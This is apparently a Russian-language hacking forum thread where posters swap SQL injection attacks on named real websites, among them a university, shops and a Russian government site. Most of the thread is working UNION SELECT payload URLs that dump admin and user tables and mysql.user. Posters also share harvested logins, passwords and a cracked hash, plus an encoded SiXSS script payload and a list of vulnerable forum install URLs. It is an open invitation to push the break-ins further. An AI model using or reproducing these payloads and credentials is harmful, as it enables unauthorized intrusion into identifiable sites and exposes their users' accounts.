SQL Инъекции

sql-inj

Новосибирский Гос Тех Университет
Сайт: http://inform.nstu.ru/
уязвимость: http://inform.nstu.ru/index.php?type=ubilei&stat=1'
подобранные таблицы: users
подобранные поля: login,password
7 организмов

нулевой организм: ZiF:0b2fdf29656163be070897c655defc12 rockme

 

sql-not_finished

Незавершенное:

Сайт: http://www.step-into-the-future.ru/ (олимпиада "Шаг в будущее")
Информация: ([email protected]:4.0.26)

Сайт: http://www.idance.ru/ (Портал современных танцев iDance)
Информация: (idancer_idancedb@localhost:4.1.22)

Сайт: http://www.kif-daks.ru/ (Оптовая торговля книгами. КИФ-Дакс)
Информация: (mataru@localhost:4.1.20-lk-log)

Кто продвинется, пишем.

 

Code:

http://opel.avto-city.ru/catalog.php?id=-3+union+select+login,2,pass,4,5,6,7+from+admin/*

opel:reklama
Автоцентр Сити - официальный дилер Opel (Опель)

 

Code:

http://www.seredina.ru/index.php?id=1&city_id=-12+union+select+concat(login,char(58),pwd)+from+admins/*

хороша дружно ищем админку

 

Мышка, ****, норушка (с) Галыгин.

P.S. Ничего интересного по части таблиц так и не нашел...

 

sql-inj

Сайт: http://www.audiobookz.ru/
уязвимость: http://www.audiobookz.ru/show_r.php?r=1'
подобранные таблицы: users
подобранные поля: login,pas,uid,name

есть админка http://www.audiobookz.ru/admin/ , но не пашет.

 

www.equipnet.ru

Code:

http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+concat(convert(version()+using+cp1251),char(59),database(),char(59),user())/*

 

cont

comedy

Нашел таблицы news, ibf_members, ibf_admin_sessions и т.д. но походу ibf_* не от того форума, который действует на сайте.

 

www.photodom.com

Code:

http://www.photodom.com/mypage.php?nick=Font'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,user(),database(),22,23,24,25,26,27,28,29/*

www.coffeeblues.ru

Code:

http://www.coffeeblues.ru/news/index.php3?id=-31+union+select+1,2,concat(database(),char(58,58),user(),char(58,58),version()),4,5,6,7,8,9,10,11,12/*

www.super.com.ua

Code:

http://www.super.com.ua/local/plug-in/a-price/showone.php?groupid=65&id=-21096+union+select+1,2,3,4,5,6,7,8,9,concat(database(),char(58,58),user(),char(58,58),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

 

apelsinclub.ru

Code:

http://www.apelsinclub.ru/show.php?event=-1+union+select+1,2,3,concat(nick,0x3a,pwd),5,6,7+from+users/*

pwd=email в форме логина.
пароли в чистом виде
admin:uuu

 

http://www.dukemednews.org/news/article.php?id=6041111+union+select+1,2,password,user,5,6+from+mysql.user/*
//---
http://www.fondsk.ru/article.php?id=63900+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+author/*
не до конца=)

 

Тут все просто в шоколаде =)

Code:

http://www.flugzeugbilder.de/show.php?id=999999+union+select+1,2,3,database(),5,user,user(),version(),password,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*

Тут не очень =\

Code:

http://www.cssbeauty.com/jobs/show.php?id=374+union+select+convert(concat_ws(char(58,58,58),version(),user(),database())+using+latin1)/*

Code:

http://www.ihrc.org.uk/show.php?id=-1740+union+select+1,2,version(),4,5,6,user(),database(),9,10,11,12,13/*

 

Code:

http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),char(58),password),11,12+from+user/*

domkinospbru:ahin

Code:

http://www.fondsk.ru/article.php?id=-641+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+article/*
http://www.flirtanica.ru/articles1.php?id=-18+union+select+1,concat(version(),char(58),database()),3,4,user()+from+articles/*
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),char(58),password),11,12+from+user/*
http://www.ollo.su/damp_phpforum/viewmsg.php?msg_id=-402+union+select+1,user(),3,database(),5,version()/*

Code:

http://www.rosprom.gov.ru/documents.php?id=-69+union+select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*

тишина . . . .если кто нибудь подберет колонки отпишитесь . . .

 

www.uragan.ru

URAGAN - сайты дешево, быстро и качественно

Code:

http://www.uragan.ru/main/txt.php?textid=howzakaz&menu=-6+union+select+1,concat(name,char(58),pass),3,4,5,6+from+users/*&submenu=33

Uragan:zxcvb9

Dialog:umnica11123

 

2KPOT_f!nd

 

рылся в исходниках, но похоже авторы скрипт переписали) ибо таблицы как по дефолту нет

 

Code:

http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,concat(uid,0x3a,uname,0x3a,name,0x3a,email,0x3a,pass),6,7,8,concat(user_icq,0x3a,user_aim,0x3a,user_yim,0x3a,user_msnm,0x3a,url,0x3a,emailpass)+from+mpn_users+where+uid=2/*

Всего 790 пользователей.

Code:

http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,concat(id,0x3a,uid,0x3a,account,0x3a,popserver,0x3a,port,0x3a,0x3a,uname,0x3a,passwd)+from+mpn_popsettings+where+id=1/*

SiXSS-атака в действии:

Code:

http://inthefray.com/html/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,83,105,88,83,83,45,97,116,116,97,99,107,46,32,72,101,108,108,111,44,65,78,84,105,67,72,65,84,33,32,58,41,34,41,60,47,115,99,114,105,112,116,62)/*

 

Delta:biz - админ.

админка на форуме:

 

http://www.bimmerdesign.ru/BD/install/upgrade_301.php?step=SomeWord
http://www.sovok.co.uk/install/upgrade_301.php?step=SomeWord
http://sonytrade.com.ua/forum/install/upgrade_301.php?step=SomeWord
http://bigtravel.ru/forum/install/upgrade_301.php?step=SomeWord
http://forum.priluchina.com/install/upgrade_301.php?step=SomeWord
http://skripach.ru/phorum/install/upgrade_301.php?step=SomeWord
http://fresh.org.ua/forum/install/upgrade_301.php?step=SomeWord

 

ты разделом не ошибся?